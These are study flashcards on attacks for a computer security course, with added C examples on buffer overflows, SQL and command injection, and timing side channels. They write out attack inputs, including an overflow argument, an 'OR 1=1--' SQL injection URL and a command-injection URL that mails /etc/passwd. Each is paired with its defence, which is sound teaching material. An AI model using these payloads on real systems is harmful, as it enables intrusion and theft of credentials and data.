Notes - Computer Security MT24, Attacks
Flashcards
Cyber kill chain
What are the steps in the cyber kill chain?
- Reconnaissance: Harvesting email addresses, conference information, etc.
- Weaponisation: Coupling exploit with backdoor into deliverable payload.
- Delivery: Delivering weaponised bundle to the victim via email, web, USB, etc.
- Exploitation: Exploiting a vulnerability to execute code on victim system.
- Installation: Installing malware on the asset.
- Command & Control: Command channel for remote manipulation of victim.
- Actions on Objectives: Accomplish original goal.
(“Really will destroy everything I can attack”)
Buffer overflows
What is a memory buffer, and what is a buffer overflow?
- A fixed-size region of memory (on the stack, heap or elsewhere) set aside to hold data temporarily.
- A buffer overflow occurs when more data is written into the buffer than it can hold, so the excess spills over and overwrites whatever sits next to it in memory (other variables, saved return addresses, etc.).
Say you have successfully caused a buffer overflow and now have EIP control. What does this mean?
- EIP: Extended Instruction Pointer, the x86 register holding the address of the next instruction to execute (RIP on x86-64).
- Typically the overflow has overwritten the saved return address on the stack, so when the function returns you choose where execution continues: injected shellcode, or existing code and gadgets already in the process.
What are some ways of defending against buffer overflow attacks?
- PIE/ASLR: Randomising the addresses at which code, stack, heap and libraries are loaded, so an attacker cannot reliably predict where to jump.
- NX (no-execute, also called DEP): Marking memory regions such as the stack and heap non-executable, so injected shellcode cannot run directly.
- RELRO: Making areas such as the GOT read-only after relocation, so they cannot be overwritten to redirect control flow.
- Stack canaries: Placing a random value before the saved return address and checking it on return, so a linear overflow is detected before the corrupted address is used.
- Safe coding: Using length-bounded copies with explicit size checks (memcpy with a checked length, snprintf) instead of unbounded calls such as strcpy and gets.
Assuming a simple layout of memory, how could you use a buffer overflow attack to execute arbitrary commands in the following:
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    void docall(char *input)
    {
        char script[] = "shutdown";   /* command later passed to system() */
        char reason[20];              /* fixed-size buffer, 20 bytes */
        strcpy(reason, input);        /* unbounded copy: no length check */
        printf("[LOG] Restarting with reason: %s\n", reason);
        system(script);
    }
    int main(int argc, char **argv) {
        if (argc < 2) return 1;       /* avoid passing a NULL argv[1] */
        docall(argv[1]);
        return 0;
    }
By passing a reason longer than 20 characters, the attacker overwrites the bytes immediately after reason, which in this simple layout are the script buffer. Twenty filler characters followed by a new command make strcpy write that command (and its terminating NUL) over "shutdown", so system() runs the attacker's command instead:
./simple AAAAAAAAAAAAAAAAAAAAls
This relies on reason sitting directly below script with no padding or canary in between; a real compiler may reorder the locals, and a stack protector would abort the program before system() is reached.
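The following is an added example, not part of the original notes, that models the "simple layout" assumed above. It places the two buffers back to back in a struct (so the spill from reason into script is well-defined here, unlike the real stack smash it stands in for), builds the payload from the buffer size and the wanted command, and shows the checked copy that would have stopped the attack. The names build_payload, simulate_overflow and copy_reason_checked are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Model of the assumed stack layout: a 20-byte reason buffer directly below
 * the 9-byte script buffer ("shutdown" plus NUL), no padding, no canary.
 * Both members are char arrays, so the compiler places them back to back. */
struct frame {
    char reason[20];
    char script[9];
};

/* Build the overflow payload: filler up to the start of script, then the
 * command the attacker wants system() to run. Returns the payload length,
 * or -1 if it does not fit in out. */
int build_payload(size_t reason_len, const char *cmd, char *out, size_t out_cap)
{
    size_t cmd_len = strlen(cmd);
    if (reason_len + cmd_len + 1 > out_cap)
        return -1;
    memset(out, 'A', reason_len);
    memcpy(out + reason_len, cmd, cmd_len + 1);   /* include the NUL */
    return (int)(reason_len + cmd_len);
}

/* What strcpy(reason, input) does to the frame. The copy is done over the
 * whole struct as raw bytes, so spilling past reason into script is defined
 * behaviour in this model. Returns 0 on success, -1 if the input would run
 * off the end of the frame entirely. */
int simulate_overflow(const char *input, char script_out[9])
{
    struct frame f;
    size_t n = strlen(input) + 1;          /* strcpy copies the NUL too */
    memset(&f, 0, sizeof f);
    memcpy(f.script, "shutdown", 9);
    if (n > sizeof f)
        return -1;
    memcpy(&f, input, n);                  /* the unbounded copy */
    memcpy(script_out, f.script, 9);
    return 0;
}

/* Hardened copy: refuse anything that does not fit in reason with its NUL.
 * Returns 1 if copied, 0 if rejected. */
int copy_reason_checked(const char *input, char *reason, size_t cap)
{
    size_t len = strlen(input);
    if (len >= cap)
        return 0;
    memcpy(reason, input, len + 1);
    return 1;
}

int main(void)
{
    char payload[64], script[9], reason[20];
    build_payload(20, "ls", payload, sizeof payload);
    printf("payload: %s\n", payload);
    simulate_overflow(payload, script);
    printf("script after overflow: %s\n", script);
    printf("checked copy accepts payload: %d\n",
           copy_reason_checked(payload, reason, sizeof reason));
    return 0;
}
```

The filler length is the distance from the start of reason to the start of script; finding that distance in a real binary (by disassembly or by crashing the program with a cyclic pattern) is the part the "simple layout" assumption skips.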
Injection attacks
What is an injection attack?
When attacker-supplied input ends up being interpreted as code or a command (SQL, shell, etc.) rather than as plain data, because the application mixes untrusted data into something an interpreter will execute.
What is the difference between code and command injection?
- Code injection: the input is interpreted as code by the application or one of its interpreters (e.g. SQL, eval), modifying the course of execution of the program.
- Command injection: the application passes the input to the operating system shell, so the attacker executes OS commands on the host.
Suppose that calling
https://example.com/accounts?id=5487
executes the following SQL:
SELECT * FROM accounts WHERE id = '5487' AND auth=1;
How could you perform an SQL injection attack here?
https://example.com/accounts?id=5487'+OR+1=1--
Here the + signs are URL-encoded spaces, so after decoding the application builds and executes:
SELECT * FROM accounts WHERE id = '5487' OR 1=1--' AND auth=1;
The injected quote closes the string, OR 1=1 makes the WHERE clause true for every row, and -- comments out the rest of the statement including the auth=1 check, so the query returns every account.
Suppose that calling
http://example.com/subscribe.php?subject=join&email=me@example.com
executes the following PHP code:
system("mail -s $subject $email < /tmp/mailinglist")
How could you perform a command injection attack here?
http://example.com/subscribe.php?subject=join&email=me@example.com+<+/etc/passwd;+cat
(spaces URL-encoded as +, other special characters percent-encoded as needed). After decoding, the server runs:
mail -s join me@example.com < /etc/passwd; cat < /tmp/mailinglist
The first command now mails /etc/passwd to the attacker, and the ; terminates it so that a second command runs; anything could be placed there instead of cat.
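The following is an added example, not part of the original notes, covering both injection cards above. It builds the SQL query and the mail command exactly as the vulnerable code does, so the effect of the two payloads can be seen, and then shows the two checks that stop them: an allow-list on the account id, and replacing the shell string with an argv array plus a format check on the address. The function names (build_account_query, account_id_is_valid, build_mail_command, email_is_plausible, build_mail_argv) are this example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* --- SQL injection ---------------------------------------------------- */

/* The vulnerable pattern: the id parameter is pasted straight into the
 * query text. Returns 0 on success, -1 if the result was truncated. */
int build_account_query(const char *id, char *out, size_t cap)
{
    int n = snprintf(out, cap,
                     "SELECT * FROM accounts WHERE id = '%s' AND auth=1;", id);
    return (n >= 0 && (size_t)n < cap) ? 0 : -1;
}

/* Allow-list check: an account id is a non-empty string of ASCII digits.
 * Quotes, spaces and comment markers never reach the SQL layer.
 * Returns 1 if valid, 0 otherwise. */
int account_id_is_valid(const char *id)
{
    if (*id == '\0')
        return 0;
    for (; *id; id++)
        if (!isdigit((unsigned char)*id))
            return 0;
    return 1;
}

/* --- Command injection ------------------------------------------------ */

/* The vulnerable pattern: one string that will be handed to a shell by
 * system(). Returns 0 on success, -1 if truncated. */
int build_mail_command(const char *subject, const char *email,
                       char *out, size_t cap)
{
    int n = snprintf(out, cap, "mail -s %s %s < /tmp/mailinglist",
                     subject, email);
    return (n >= 0 && (size_t)n < cap) ? 0 : -1;
}

/* Format check for the address: a conservative character set, exactly one
 * '@', and no leading '-' (which would otherwise be parsed as an option by
 * mail even when passed as a separate argument). Returns 1 if plausible. */
int email_is_plausible(const char *email)
{
    const char *at = strchr(email, '@');
    if (*email == '\0' || *email == '-' || at == NULL || strchr(at + 1, '@'))
        return 0;
    for (const char *p = email; *p; p++) {
        unsigned char ch = (unsigned char)*p;
        if (!isalnum(ch) && !strchr("._+-@", ch))
            return 0;
    }
    return 1;
}

/* Hardened: build an argv array for execvp() instead of a shell string.
 * Each user value becomes exactly one argument, so metacharacters such as
 * ';' or '<' are never seen by a shell. The stdin redirection of the
 * original command would be done with open() and dup2() before exec.
 * Returns the argument count. */
int build_mail_argv(const char *subject, const char *email, const char *argv[5])
{
    argv[0] = "mail";
    argv[1] = "-s";
    argv[2] = subject;
    argv[3] = email;
    argv[4] = NULL;
    return 4;
}

int main(void)
{
    char buf[256];
    build_account_query("5487' OR 1=1--", buf, sizeof buf);
    printf("%s\n", buf);
    build_mail_command("join", "me@example.com < /etc/passwd; cat", buf, sizeof buf);
    printf("%s\n", buf);
    printf("id valid: %d, email plausible: %d\n",
           account_id_is_valid("5487' OR 1=1--"),
           email_is_plausible("me@example.com < /etc/passwd; cat"));
    return 0;
}
```

For the SQL case the allow-list is a stopgap; the proper fix is a parameterised query (for example sqlite3_prepare_v2 followed by sqlite3_bind_int in SQLite's C API), which keeps the id out of the query text altogether and is not shown here because the example runs without a database.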
Side-channel attacks
Define a side-channel attack and describe two variants.
Learning secret information (typically key material) not by breaking the algorithm mathematically but by observing the physical behaviour of the system that runs it.
- Timing attacks: Measure variations in running time that depend on the secret (e.g. a comparison or branch that exits early).
- Power attacks: Measure variations in the power consumption of the device while it performs the cryptographic operation.
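The following is an added example, not part of the original notes, for the timing variant. Instead of measuring wall-clock time it counts how many bytes a comparison examines, which is what the timing leak encodes: an early-exit compare reveals the position of the first wrong byte, so an attacker who can query it recovers a secret one byte at a time. The constant-time compare does the same amount of work for every input. The names compare_early_exit, compare_const_time and recover_secret are this example's own, and the secret is constructed for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Early-exit comparison, the shape of memcmp()/strcmp(): it stops at the
 * first differing byte. *ops receives how many bytes were examined, standing
 * in for the time an attacker would measure. Returns 1 if equal. */
int compare_early_exit(const uint8_t *a, const uint8_t *b, size_t len, size_t *ops)
{
    *ops = 0;
    for (size_t i = 0; i < len; i++) {
        (*ops)++;
        if (a[i] != b[i])
            return 0;
    }
    return 1;
}

/* Constant-time comparison: touches every byte and ORs the differences into
 * an accumulator, so the work done does not depend on where the inputs
 * differ. Returns 1 if equal. */
int compare_const_time(const uint8_t *a, const uint8_t *b, size_t len, size_t *ops)
{
    uint8_t diff = 0;
    *ops = 0;
    for (size_t i = 0; i < len; i++) {
        (*ops)++;
        diff |= a[i] ^ b[i];
    }
    return diff == 0;
}

/* Attacker's loop against the leaky compare. For each position, try every
 * byte value and keep the one that makes the oracle examine one more byte
 * (or accept the whole guess). The secret is only ever touched through the
 * oracle call, as it would be for a remote check; the final loop that counts
 * correct leading bytes is there for verification only. */
size_t recover_secret(const uint8_t *secret, size_t len, uint8_t *guess)
{
    size_t ops;
    memset(guess, 0, len);
    for (size_t pos = 0; pos < len; pos++) {
        for (int v = 0; v < 256; v++) {
            guess[pos] = (uint8_t)v;
            int match = compare_early_exit(secret, guess, len, &ops);
            if (match || ops > pos + 1)
                break;               /* byte at pos is right: oracle went further */
        }
    }
    size_t correct = 0;
    while (correct < len && guess[correct] == secret[correct])
        correct++;
    return correct;
}

int main(void)
{
    const uint8_t secret[] = "s3cr3tkey";      /* constructed secret */
    uint8_t guess[9];
    size_t ops, n = recover_secret(secret, 9, guess);
    printf("recovered %zu/9 bytes: %.9s\n", n, (const char *)guess);
    compare_const_time(secret, guess, 9, &ops);
    printf("constant-time compare always examines %zu bytes\n", ops);
    return 0;
}
```

The same leak appears whenever a check on secret data returns early: MAC verification with memcmp, password or token comparison, padding checks. The cure is to make the work independent of the data, as compare_const_time does, and to compare fixed-length digests rather than the raw values.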
Ransomware attacks
What is the similarity between denial of service attacks and ransomware?
- Both are attacks on availability:
- Denial of service attacks deny access to a service, whereas
- Ransomware attacks deny access to data (by encrypting it).
Define double extortion in the context of ransomware attacks.
Where attackers also exfiltrate the data before encrypting it and threaten to publish it if the ransom is not paid (on top of encrypting everything), so that having backups no longer removes the pressure to pay.
Miscellaneous attacks
What is a drive-by-download attack?
Where malware is downloaded and installed as a side effect of visiting a web page, either with no interaction at all (through a browser or plugin exploit) or when the user authorises a download without understanding what is being downloaded.